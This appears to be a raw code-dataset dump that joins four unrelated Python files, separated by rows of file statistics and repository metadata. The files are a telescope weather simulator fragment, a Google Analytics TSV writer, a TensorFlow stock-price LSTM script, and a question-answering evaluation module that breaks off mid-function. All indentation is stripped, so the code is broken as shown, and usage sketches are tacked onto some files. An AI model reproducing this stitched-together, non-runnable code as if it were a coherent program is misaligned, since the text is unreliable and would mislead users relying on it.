# Generate a random atmospheric transparency time series.
self._table['transparency'] = desimodel.weather.sample_transp(
num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32)
if replay == 'random':
# Generate a bootstrap sampling of the historical weather years.
years_to_simulate = config.last_day().year - config.first_day().year + 1
history = ['Y{}'.format(year) for year in range(2007, 2018)]
replay = ','.join(gen.choice(history, years_to_simulate, replace=True))
# Lookup the dome closed fractions for each night of the survey.
# This step is deterministic and only depends on the config weather
# parameter, which specifies which year(s) of historical daily
# weather to replay during the simulation.
dome_closed_frac = desimodel.weather.dome_closed_fractions(
start_date, stop_date, replay=replay)
r = gen.uniform(size=num_nights)
r2 = gen.uniform(size=num_nights)
dome_closed_frac[r2 < extra_downtime] = 1.
# Convert fractions of scheduled time to hours per night.
ilo, ihi = (start_date - ephem.start_date).days, (stop_date - ephem.start_date).days
bright_dusk = ephem._table['brightdusk'].data[ilo:ihi]
bright_dawn = ephem._table['brightdawn'].data[ilo:ihi]
dome_closed_time = dome_closed_frac * (bright_dawn - bright_dusk)
# Randomly pick between three scenarios for partially closed nights:
# 1. closed from dusk, then open the rest of the night.
# 2. open at dusk, then closed for the rest of the night.
# 3. open at dusk and dawn, with a closed period during the night.
# Pick scenarios 1+2 with probability equal to the closed fraction.
# Use a fixed number of random numbers to decouple from the seeing
# and transparency sampling below.
self._table['open'] = np.ones(num_rows, bool)
for i in range(num_nights):
sl = slice(i * steps_per_day, (i + 1) * steps_per_day)
night_mjd = self._table['mjd'][sl]
# Dome is always closed before dusk and after dawn.
closed = (night_mjd < bright_dusk[i]) | (night_mjd >= bright_dawn[i])
if dome_closed_frac[i] == 0:
# Dome open all night.
pass
elif dome_closed_frac[i] == 1:
# Dome closed all night. This occurs with probability frac / 2.
closed[:] = True
elif r[i] < 0.5 * dome_closed_frac[i]:
# Dome closed during first part of the night.
# This occurs with probability frac / 2.
closed |= (night_mjd < bright_dusk[i] + dome_closed_time[i])
elif r[i] < dome_closed_frac[i]:
# Dome closed during last part of the night.
# This occurs with probability frac / 2.
closed |= (night_mjd > bright_dawn[i] - dome_closed_time[i])
else:
# Dome closed during the middle of the night.
# This occurs with probability 1 - frac. Use the value of r[i]
# as the fractional time during the night when the dome reopens.
dome_open_at = bright_dusk[i] + r[i] * (bright_dawn[i] - bright_dusk[i])
dome_closed_at = dome_open_at - dome_closed_time[i]
closed |= (night_mjd >= dome_closed_at) & (night_mjd < dome_open_at)
self._table['open'][sl][closed] = False
self.start_date = start_date
self.stop_date = stop_date
self.num_nights = num_nights
self.steps_per_day = steps_per_day
self.replay = replay
def save(self, filename, overwrite=True):
"""Save the generated weather to a file.
The saved file can be restored using the constructor `restore`
parameter.
Parameters
----------
filename : str
Name of the file where the weather should be saved. A
relative path name refers to the :meth:`configuration output path
<desisurvey.config.Configuration.get_path>`.
overwrite : bool
Silently overwrite any existing file when this is True.
"""
config = desisurvey.config.Configuration()
filename = config.get_path(filename)
self._table.write(filename, overwrite=overwrite)
self.log.info('Saved weather to {0}.'.format(filename))
def get(self, time):
"""Get the weather conditions at the specified time(s).
Returns the conditions at the closest tabulated time, rather than
using interpolation.
Parameters
----------
time : astropy.time.Time
Time(s) when the simulated weather is requested.
Returns
-------
table slice
Slice of precomputed table containing row(s) corresponding
to the requested time(s).
"""
offset = np.floor(
(time.mjd - self._table['mjd'][0]) * self.steps_per_day + 0.5
).astype(int)
if np.any(offset < 0) or np.any(offset >= len(self._table)):
raise ValueError('Cannot get weather beyond tabulated range.')
return self._table[offset]
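# Usage sketch: a hedged example of driving this class; it assumes a valid
# desisurvey configuration (survey start/stop dates, output path) is available
# in the environment, and it peeks at the internal table only for demonstration.
if __name__ == "__main__":
    weather = Weather(seed=123, replay='Y2015', time_step=5)  # worst-case weather year
    weather.save('weather_y2015.fits')  # path resolved through the survey config
    t0 = astropy.time.Time(weather._table['mjd'][0], format='mjd')
    row = weather.get(t0)
    print(row['seeing'], row['transparency'], row['open'])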
| 43.973333
| 92
| 0.63392
| 1,279
| 9,894
| 4.761532
| 0.246286
| 0.031199
| 0.021675
| 0.009852
| 0.15665
| 0.103777
| 0.098851
| 0.082923
| 0.063383
| 0.063383
| 0
| 0.009968
| 0.280069
| 9,894
| 224
| 93
| 44.169643
| 0.845009
| 0.393168
| 0
| 0.057143
| 0
| 0
| 0.057512
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0.009524
| 0.104762
| 0
| 0.161905
| 0.009524
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1398a0a81ef6551f1edec803a59f1dbf8ef55e95
| 8,075
|
py
|
Python
|
lib/csv_writer.py
|
takeratta/ga-dev-tools
|
19dcf7c750af8214e5a306fc0f8e2b28bef7bb40
|
[
"Apache-2.0"
] | 2
|
2020-07-02T14:29:44.000Z
|
2021-12-02T09:31:36.000Z
|
lib/csv_writer.py
|
jeffreychung/ga-dev-tools
|
19dcf7c750af8214e5a306fc0f8e2b28bef7bb40
|
[
"Apache-2.0"
] | 3
|
2022-02-19T14:08:17.000Z
|
2022-03-03T22:32:16.000Z
|
lib/csv_writer.py
|
colorstheforce/ga-dev-tools
|
46dd9652f9a7d9f8255b6d401985fdcfb8b61b25
|
[
"Apache-2.0"
] | 1
|
2021-01-02T17:04:16.000Z
|
2021-01-02T17:04:16.000Z
|
# coding=utf-8
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility to convert a Data Export API reponse into TSV.
This provides utitlites to both print TSV files to the standard output
as well as directly to a file. This logic handles all the utf-8 conversion.
GetTsvFilePrinter: Returns an instantiated object to output to files.
GetTsvScreenPrinter: Returns an instantiated object to output to the screen.
UnicodeWriter(): Utf-8 encodes output.
ExportPrinter(): Converts the Data Export API response into tabular data.
"""
__author__ = 'api.nickm@ (Nick Mihailovski)'
import codecs
import csv
import StringIO
import sys
import types
# A list of special characters that need to be escaped.
SPECIAL_CHARS = ('+', '-', '/', '*', '=')
# TODO(nm): Test leading numbers.
def GetTsvFilePrinter(file_name):
"""Returns a ExportPrinter object to output to file_name.
Args:
file_name: string The name of the file to output to.
Returns:
The newly created ExportPrinter object.
"""
my_handle = open(file_name, 'w')  # open the output file for writing
writer = UnicodeWriter(my_handle, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvScreenPrinter():
"""Returns a ExportPrinter object to output to std.stdout."""
writer = UnicodeWriter(sys.stdout, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvStringPrinter(f):
"""Returns a ExportPrinter object to output to std.stdout."""
writer = UnicodeWriter(f, dialect='excel-tab')
return ExportPrinter(writer)
# Wrapper to output to utf-8. Taken mostly / directly from Python docs:
# http://docs.python.org/library/csv.html
class UnicodeWriter(object):
"""A CSV writer which uses the csv module to output csv compatible formats.
Will write rows to CSV file "f", which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding='utf-8', **kwds):
# Redirect output to a queue
self.queue = StringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
# pylint: disable=g-bad-name
def writerow(self, row):
"""Writes a CSV row.
Args:
row: list The row to write to the CSV output.
"""
self.writer.writerow([s.encode('utf-8') for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode('utf-8')
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
# pylint: disable=g-bad-name
def writerows(self, rows):
"""Writes rows for CSV output.
Args:
rows: list of rows to write.
"""
for row in rows:
self.writerow(row)
class ExportPrinter(object):
"""Utility class to output a the data feed as tabular data."""
def __init__(self, writer):
"""Initializes the class.
Args:
writer: Typically an instance of UnicodeWriter. The interface for this
object provides two methods, writerow and writerows, which
accept a list or a list of lists respectively and process them as
needed.
"""
self.writer = writer
def Output(self, results):
"""Outputs formatted rows of data retrieved from the Data Export API.
This uses the writer object to output the data in the Data Export API.
Args:
results: The response from the data export API.
"""
if not results.get('rows'):
self.writer.writerow(['No Results found'])  # wrap in a list so the message stays in one cell
else:
self.OutputProfileName(results)
self.writer.writerow([])
self.OutputContainsSampledData(results)
self.writer.writerow([])
self.OutputQueryInfo(results)
self.writer.writerow([])
self.OutputHeaders(results)
self.OutputRows(results)
self.writer.writerow([])
self.OutputRowCounts(results)
self.OutputTotalsForAllResults(results)
def OutputProfileName(self, results):
"""Outputs the profile name along with the qurey."""
profile_name = ''
info = results.get('profileInfo')
if info:
profile_name = info.get('profileName')
self.writer.writerow(['Report For View (Profile): ', profile_name])
def OutputQueryInfo(self, results):
"""Outputs the query used."""
self.writer.writerow(['These query parameters were used:'])
query = results.get('query')
for key, value in query.iteritems():
if type(value) == types.ListType:
value = ','.join(value)
else:
value = str(value)
value = ExcelEscape(value)
self.writer.writerow([key, value])
def OutputContainsSampledData(self, results):
"""Outputs whether the resuls have been sampled."""
sampled_text = 'do not'
if results.get('containsSampledData'):
sampled_text = 'do'
row_text = 'These results %s contain sampled data.' % sampled_text
self.writer.writerow([row_text])
def OutputHeaders(self, results):
"""Outputs all the dimension and metric names in order."""
row = []
for header in results.get('columnHeaders'):
row.append(header.get('name'))
self.writer.writerow(row)
def OutputRows(self, results):
"""Outputs all the rows in the table."""
# Replace any first characters that have an = with '=
for row in results.get('rows'):
out_row = []
for cell in row:
cell = ExcelEscape(cell)
out_row.append(cell)
self.writer.writerow(out_row)
def OutputRowCounts(self, results):
"""Outputs how many rows were returned vs rows that were matched."""
items = str(results.get('itemsPerPage'))
matched = str(results.get('totalResults'))
output = [
['Rows Returned', items],
['Rows Matched', matched]
]
self.writer.writerows(output)
def OutputTotalsForAllResults(self, results):
"""Outputs the totals for all results matched by the query.
This is not the sum of the values returned in the response.
This will align the metric totals in the same columns as
the headers are printed. The totals are stored as a dict, where the
key is the metric name and the value is the total. To align these
totals in the proper columns, a position index of the metric name
and its position in the table is first created. Then the totals
are added by position to a row of empty strings.
Args:
results: API Response from Core Reporting API.
"""
# Create the metric position index.
metric_index = {}
headers = results.get('columnHeaders')
for index in range(0, len(headers)):
header = headers[index]
if header.get('columnType') == 'METRIC':
metric_index[header.get('name')] = index
# Create a row of empty strings the same length as the header.
row = [''] * len(headers)
# Use the position index to output the totals in the right columns.
totals = results.get('totalsForAllResults')
for metric_name, metric_total in totals.iteritems():
index = metric_index[metric_name]
row[index] = metric_total
self.writer.writerows([['Totals For All Rows Matched'], row])
def ExcelEscape(input_value):
"""Escapes the first character of a string if it is special in Excel.
Args:
input_value: string The value to escape.
Returns:
A string that has the first character escaped if it is special.
"""
if input_value and input_value[0] in SPECIAL_CHARS:
return "'" + input_value
return input_value
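# Usage sketch: a hedged, Python 2 example of feeding a hand-built, API-shaped
# response through the screen printer; the dict below is invented stand-in data,
# not real Core Reporting API output.
if __name__ == '__main__':
    fake_results = {
        'profileInfo': {'profileName': 'Demo View'},
        'query': {'metrics': ['ga:sessions'], 'start-date': '2015-01-01'},
        'containsSampledData': False,
        'columnHeaders': [
            {'name': 'ga:source', 'columnType': 'DIMENSION'},
            {'name': 'ga:sessions', 'columnType': 'METRIC'},
        ],
        'rows': [['google', '=1200'], ['(direct)', '800']],
        'itemsPerPage': 2,
        'totalResults': 2,
        'totalsForAllResults': {'ga:sessions': '2000'},
    }
    printer = GetTsvScreenPrinter()
    printer.Output(fake_results)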
| 30.130597
| 78
| 0.687059
| 1,094
| 8,075
| 5.031079
| 0.274223
| 0.030887
| 0.039244
| 0.014535
| 0.119004
| 0.0754
| 0.059411
| 0.023619
| 0.023619
| 0.023619
| 0
| 0.002994
| 0.213994
| 8,075
| 267
| 79
| 30.243446
| 0.864188
| 0.464025
| 0
| 0.081818
| 0
| 0
| 0.097986
| 0
| 0
| 0
| 0
| 0.003745
| 0
| 1
| 0.145455
| false
| 0
| 0.045455
| 0
| 0.254545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13991543937ea97e225d2fffa3ed5c4c26a13a38
| 2,924
|
py
|
Python
|
resdata/TensorFlow/RNN_Prediction/stockPrediction202005201318.py
|
yuwenxianglong/zhxsh.github.io
|
427d14b787e55df26e03a069288815b14ab6b534
|
[
"MIT"
] | null | null | null |
resdata/TensorFlow/RNN_Prediction/stockPrediction202005201318.py
|
yuwenxianglong/zhxsh.github.io
|
427d14b787e55df26e03a069288815b14ab6b534
|
[
"MIT"
] | 1
|
2021-03-30T04:35:57.000Z
|
2021-03-30T04:35:57.000Z
|
resdata/TensorFlow/RNN_Prediction/stockPrediction202005201318.py
|
yuwenxianglong/yuwenxianglong.github.io
|
196e32d2775ef3a3863603cb5c30023450a1944c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
@Project : RNN_Prediction
@Author : Xu-Shan Zhao
@Filename: stockPrediction202005201318.py
@IDE : PyCharm
@Time1 : 2020-05-20 13:18:46
@Time2 : 2020/5/20 13:18
@Month1 : May
@Month2 : May
"""
import tushare as ts
import tensorflow as tf
import pandas as pd
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
stock_catl = ts.get_hist_data('300750')
stock_catl = stock_catl.sort_index(ascending=True)
stock_catl = (stock_catl - stock_catl.mean()) / \
(stock_catl.max() - stock_catl.min())
# train, val = train_test_split(stock_catl, test_size=0.5)
# train = train.sort_index(ascending=True)
# val = val.sort_index(ascending=True)
train = stock_catl.iloc[:-60, :]
val = stock_catl.iloc[-60:, :]
window_size = 30
column = 'high'
epoches = 300
def batch_dataset(dataset):
dataset_batched = dataset.batch(window_size, drop_remainder=True)
return dataset_batched
def zip_ds(dataset):
ds_data = tf.constant(dataset.values, dtype=tf.float32)
ds_data = tf.data.Dataset.from_tensor_slices(ds_data). \
window(window_size, shift=1).flat_map(batch_dataset)
ds_label = tf.constant(dataset.values[window_size:], dtype=tf.float32)
ds_label = tf.data.Dataset.from_tensor_slices(ds_label)
ds_train = tf.data.Dataset.zip((ds_data, ds_label)).batch(128).repeat()
return ds_train
ds_train = zip_ds(train)
ds_val = zip_ds(val)
model = tf.keras.Sequential(
[
tf.keras.layers.LSTM(128, return_sequences=True, activation='relu'),
tf.keras.layers.LSTM(128, activation='relu'),
tf.keras.layers.Dense(13)
]
)
optimizer = tf.keras.optimizers.Adam(learning_rate=0.01)
model.compile(optimizer=optimizer, loss='mse')
history = model.fit(
ds_train, epochs=epoches,
steps_per_epoch=5,
validation_data=ds_val,
validation_steps=1
)
model.save('stockLSTM')
# Plot loss function
plt.figure(figsize=(19, 9))
ax = plt.gca()
plt.plot(range(len(history.history['loss'])), history.history['loss'])
plt.plot(range(len(history.history['val_loss'])), history.history['val_loss'])
ax.set_yscale('log')
plt.show()
# Compare fitted and real values.
dff = pd.DataFrame()
for i in range(len(stock_catl) - window_size):
fits = model.predict(tf.constant(tf.expand_dims(stock_catl.values[i:i + window_size, :], axis=0)))
dffits = pd.DataFrame(fits, columns=stock_catl.columns)
dff = dff.append(dffits)
dff.index = stock_catl.index[window_size:]
plt.figure(figsize=(19, 9))
dff[column].plot()
stock_catl.iloc[window_size:, :][column].plot(style='-o')
plt.show()
# Predict the next 100 business days.
dfp = stock_catl.copy()
for i in range(100):
pres = model.predict(tf.constant(tf.expand_dims(dfp.values[-1 * window_size:], axis=0)))
dfpres = pd.DataFrame(pres, columns=stock_catl.columns)
dfp = dfp.append(dfpres, ignore_index=True)
dfp[column].plot()
plt.show()
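# Windowing sketch: a hedged toy check of what zip_ds builds. Each element pairs
# a (window_size, n_features) slice with the row window_size steps after the
# window start; the tiny synthetic frame below exists only to show the shapes.
import numpy as np
toy = pd.DataFrame(np.arange(80, dtype='float32').reshape(40, 2), columns=['a', 'b'])
ds_toy = zip_ds(toy)
for data, label in ds_toy.take(1):
    print(data.shape, label.shape)  # with window_size = 30: (10, 30, 2) and (10, 2)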
| 28.666667
| 102
| 0.713748
| 443
| 2,924
| 4.534989
| 0.363431
| 0.080637
| 0.020906
| 0.026879
| 0.152812
| 0.093579
| 0.064709
| 0
| 0
| 0
| 0
| 0.03808
| 0.137825
| 2,924
| 101
| 103
| 28.950495
| 0.758826
| 0.151505
| 0
| 0.075758
| 0
| 0
| 0.023916
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.075758
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13998d176731562bde5bd78d5d04ea6a48f3fc9c
| 19,221
|
py
|
Python
|
language/labs/drkit/evaluate.py
|
Xtuden-com/language
|
70c0328968d5ffa1201c6fdecde45bbc4fec19fc
|
[
"Apache-2.0"
] | 1,199
|
2018-10-16T01:30:18.000Z
|
2022-03-31T21:05:24.000Z
|
language/labs/drkit/evaluate.py
|
Xtuden-com/language
|
70c0328968d5ffa1201c6fdecde45bbc4fec19fc
|
[
"Apache-2.0"
] | 116
|
2018-10-18T03:31:46.000Z
|
2022-03-24T13:40:50.000Z
|
language/labs/drkit/evaluate.py
|
Xtuden-com/language
|
70c0328968d5ffa1201c6fdecde45bbc4fec19fc
|
[
"Apache-2.0"
] | 303
|
2018-10-22T12:35:12.000Z
|
2022-03-27T17:38:17.000Z
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Evaluate lazy slot filling results."""
import codecs
import collections
import gzip
import json
import random
import re
import string
import unicodedata
from absl import app
from absl import flags
from bert import tokenization
from language.labs.drkit import input_fns
import numpy as np
import tensorflow.compat.v1 as tf
PUNCTUATION = frozenset(string.punctuation)
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string("ground_truth_file", None,
"File with ground truth answers.")
flags.DEFINE_string("predicted_answers_file", None,
"File with predicted answers from model.")
flags.DEFINE_string("relation_counts_file", None,
"JSON file with relation counts.")
class NumpyEncoder(json.JSONEncoder):
"""Special json encoder for numpy types."""
def default(self, obj):
if isinstance(obj, (np.int_, np.intc, np.intp, np.int8, np.int16, np.int32,
np.int64, np.uint8, np.uint16, np.uint32, np.uint64)):
return int(obj)
elif isinstance(obj, (np.float_, np.float16, np.float32, np.float64)):
return float(obj)
elif isinstance(obj, (np.ndarray,)): # This is the fix
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def wikimovie_eval_fn(dataset, results, name_map, output_prediction_file,
**kwargs):
"""Compute evaluation metrics for OneHopDataset or TwoHopDataset.
Args:
dataset: An object of type OneHopDataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples}
gt_ques = {ex.qas_id: ex.question_text for ex in dataset.examples}
gt_entity = {ex.qas_id: ex.subject_entity[0] for ex in dataset.examples}
inf_chain = {ex.qas_id: ex.inference_chain for ex in dataset.examples}
# Compute basic metrics.
num_correct = 0.
all_predictions = {}
chain2stats = {ch: [0., 0.] for ch in inf_chain.values()}
incorrect_results, correct_results = [], []
for result in results:
qas_id = result["qas_ids"]
prediction = result["predictions"]
if prediction in gt_answer[qas_id]:
num_correct += 1
chain2stats[inf_chain[qas_id]][0] += 1
correct_results.append({
"qas_id": result["qas_ids"],
"question": gt_ques[qas_id],
"answers": gt_answer[qas_id],
"subject": gt_entity[qas_id],
"inf-chain": inf_chain[qas_id],
"predictions": result["predictions"],
})
for hop in range(3):
if "sparse_%d" % hop in result:
correct_results[-1].update({
"sparse_%d" % hop: result["sparse_%d" % hop],
"dense_%d" % hop: result["dense_%d" % hop],
"mention_%d" % hop: result["mention_%d" % hop],
"entity_%d" % hop: result["entity_%d" % hop],
"sparse_scores_%d" % hop: result["sparse_scores_%d" % hop],
"dense_scores_%d" % hop: result["dense_scores_%d" % hop],
"mention_scores_%d" % hop: result["mention_scores_%d" % hop],
"entity_scores_%d" % hop: result["entity_scores_%d" % hop],
})
else:
incorrect_results.append({
"qas_id": result["qas_ids"],
"question": gt_ques[qas_id],
"answers": gt_answer[qas_id],
"subject": gt_entity[qas_id],
"inf-chain": inf_chain[qas_id],
"predictions": result["predictions"],
})
for hop in range(3):
if "sparse_%d" % hop in result:
incorrect_results[-1].update({
"sparse_%d" % hop: result["sparse_%d" % hop],
"dense_%d" % hop: result["dense_%d" % hop],
"mention_%d" % hop: result["mention_%d" % hop],
"entity_%d" % hop: result["entity_%d" % hop],
"sparse_scores_%d" % hop: result["sparse_scores_%d" % hop],
"dense_scores_%d" % hop: result["dense_scores_%d" % hop],
"mention_scores_%d" % hop: result["mention_scores_%d" % hop],
"entity_scores_%d" % hop: result["entity_scores_%d" % hop],
})
chain2stats[inf_chain[qas_id]][1] += 1
all_predictions[qas_id] = name_map[str(prediction)]
accuracy = num_correct / len(all_predictions)
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
json.dump(
random.sample(incorrect_results, 100),
tf.gfile.Open(output_prediction_file + ".incorrect", "w"),
cls=NumpyEncoder)
json.dump(
random.sample(correct_results, 100),
tf.gfile.Open(output_prediction_file + ".correct", "w"),
cls=NumpyEncoder)
# Return metrics.
metrics = {
"accuracy": accuracy,
}
for ch, stats in chain2stats.items():
metrics["inference-chains-acc/" + ch] = stats[0] / stats[1]
return metrics
def multihop_eval_fn(dataset,
results,
name_map,
output_prediction_file,
supervision="mention",
**kwargs):
"""Compute evaluation metrics for OneHopDataset or TwoHopDataset.
Args:
dataset: An object of type OneHopDataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
supervision: Type of supervision used in the model.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_mentions = {ex.qas_id: ex.answer_mention[0] for ex in dataset.examples}
if supervision == "mention":
gt_answer = gt_mentions
else:
gt_answer = {ex.qas_id: ex.answer_entity[0] for ex in dataset.examples}
# Compute basic metrics.
num_correct = 0.
all_predictions = {}
for result in results:
qas_id = result["qas_ids"]
prediction = result["predictions"]
if prediction == gt_answer[qas_id]:
num_correct += 1
all_predictions[qas_id] = name_map[str(prediction)]
accuracy = num_correct / len(all_predictions)
# Compute advanced metrics.
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
micro, macro, _, _ = compute_scores(dataset.gt_file, output_prediction_file)
# Return metrics.
metrics = {
"accuracy": accuracy,
"micro-p": micro[0],
"micro-r": micro[1],
"micro-f": micro[2],
"macro-p": macro[0],
"macro-r": macro[1],
"macro-f": macro[2],
}
return metrics
def hotpot_eval_fn(dataset, results, name_map, output_prediction_file,
**kwargs):
"""Compute evaluation metrics for HotpotQADataset.
Args:
dataset: An object of type HotpotQADataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples}
gt_types = {ex.qas_id: ex.inference_chain for ex in dataset.examples}
# Compute basic metrics.
num_correct = {2: 0., 5: 0., 10: 0., 20: 0.}
aps = []
no_answer = 0.
all_predictions = {}
bridge_acc, comp_acc = 0., 0.
bridge_tot, comp_tot = 0, 0
single_acc = 0.
layer_weights = np.zeros_like(results[0]["layer_probs"])
num_layer_entities = {i: 0. for i in range(layer_weights.shape[0])}
num_new_entities = {i: 0. for i in range(layer_weights.shape[0])}
for result in results:
qas_id = result["qas_ids"].decode("utf-8")
preds = result["top_idx"]
scores = result["top_vals"]
ans = gt_answer[qas_id]
my_type = gt_types[qas_id]
if my_type == "bridge":
bridge_tot += 1
else:
comp_tot += 1
ranks = np.where(np.in1d(preds, ans))[0]
ranks = np.sort(ranks)
ap = 0.
cnt = 0.
if any(rr < 10 for rr in ranks):
single_acc += 1
if ranks.shape[0] == 0:
no_answer += 1
for rr in ranks:
cnt += 1
ap += cnt / (rr + 1)
if ans:
aps.append(ap / len(ans))
else:
aps.append(0.)
found = False
for key in [2, 5, 10, 20]:
if found or np.in1d(ans, preds[:key]).all():
num_correct[key] += 1
found = True
if key == 10:
if my_type == "bridge":
bridge_acc += 1
else:
comp_acc += 1
# Non-accuracy stats
layer_weights += result["layer_probs"]
layer_entities = {i: set() for i in range(layer_weights.shape[0])}
all_predictions[qas_id] = {}
for i in range(layer_weights.shape[0]):
layer_entities[i] = set(
[ee for ee in result["layer_%d_ent" % i] if ee != -1])
num_layer_entities[i] += len(layer_entities[i])
num_new_entities[i] += len(layer_entities[i] - layer_entities[0])
# all_predictions[qas_id]["layer_%d" % i] = [
# name_map[str(ee)] for ee in layer_entities[i]]
all_predictions[qas_id]["predictions"] = [
(name_map[str(pred)], str(scores[i])) for i, pred in enumerate(preds)
]
tf.logging.info("Evaluated %d items", len(all_predictions))
accuracy = {
key: (num_correct[key] / len(all_predictions)) for key in num_correct
}
# Compute advanced metrics.
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
# Return metrics.
metrics = {"eval/@%d" % key: accuracy[key] for key in accuracy}
metrics["accuracy"] = accuracy[10]
metrics["eval/map"] = sum(aps) / len(all_predictions)
metrics["eval/bridge_accuracy"] = bridge_acc / bridge_tot
metrics["eval/comparison_accuracy"] = comp_acc / comp_tot
metrics["analysis/single_accuracy"] = single_acc / len(all_predictions)
metrics["analysis/no_answers"] = no_answer / len(all_predictions)
for i in range(layer_weights.shape[0]):
metrics["analysis/layer_weight_%d" %
i] = layer_weights[i] / len(all_predictions)
metrics["analysis/num_entities_%d" %
i] = num_layer_entities[i] / len(all_predictions)
metrics["analysis/num_new_entities_%d" %
i] = num_new_entities[i] / len(all_predictions)
return metrics
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r"\b(a|an|the)\b", " ", text)
def white_space_fix(text):
return " ".join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return "".join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def f1_score(prediction, ground_truth):
"""Compute F1 score."""
prediction_tokens = normalize_answer(prediction).split()
ground_truth_tokens = normalize_answer(ground_truth).split()
common = collections.Counter(prediction_tokens) & collections.Counter(
ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def exact_match_score(prediction, ground_truth):
"""Compute EM score."""
return normalize_answer(prediction) == normalize_answer(ground_truth)
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
scores_for_ground_truths = []
for ground_truth in ground_truths:
my_score = metric_fn(prediction, ground_truth)
scores_for_ground_truths.append(my_score)
return max(scores_for_ground_truths)
def read_predictions(prediction_file):
with tf.gfile.Open(prediction_file) as f:
predictions = json.load(f)
return predictions
def read_answers(gold_file):
"""Read ground truth answers."""
answers = {}
f = tf.gfile.Open(gold_file)
if gold_file.endswith(".gz"):
f = gzip.GzipFile(fileobj=f)
for i, line in enumerate(f):
example = json.loads(line)
if i == 0 and "header" in example:
continue
for qa in example["qas"]:
answers[qa["qid"]] = qa["answers"]
f.close()
return answers
def evaluate(answers, predictions, skip_no_answer=False):
"""Compute F1 and EM scores."""
f1 = exact_match = total = 0
for qid, ground_truths in answers.items():
if qid not in predictions:
if not skip_no_answer:
message = "Unanswered question %s will receive score 0." % qid
print(message)
total += 1
continue
total += 1
prediction = predictions[qid]
exact_match += metric_max_over_ground_truths(exact_match_score, prediction,
ground_truths)
f1 += metric_max_over_ground_truths(f1_score, prediction, ground_truths)
exact_match = 100.0 * exact_match / total
f1 = 100.0 * f1 / total
return {"exact_match": exact_match, "f1": f1}
def mrqa_eval_fn(dataset_file, predictions_file, skip_no_answer=True):
answers = read_answers(dataset_file)
predictions = read_predictions(predictions_file)
return evaluate(answers, predictions, skip_no_answer)
def compute_scores(ground_truth_file, predicted_answers_file):
"""Read predictions and ground truth and return P, R, F."""
telemetry, incorrect = read_results(ground_truth_file, predicted_answers_file)
micro = aprf(telemetry)
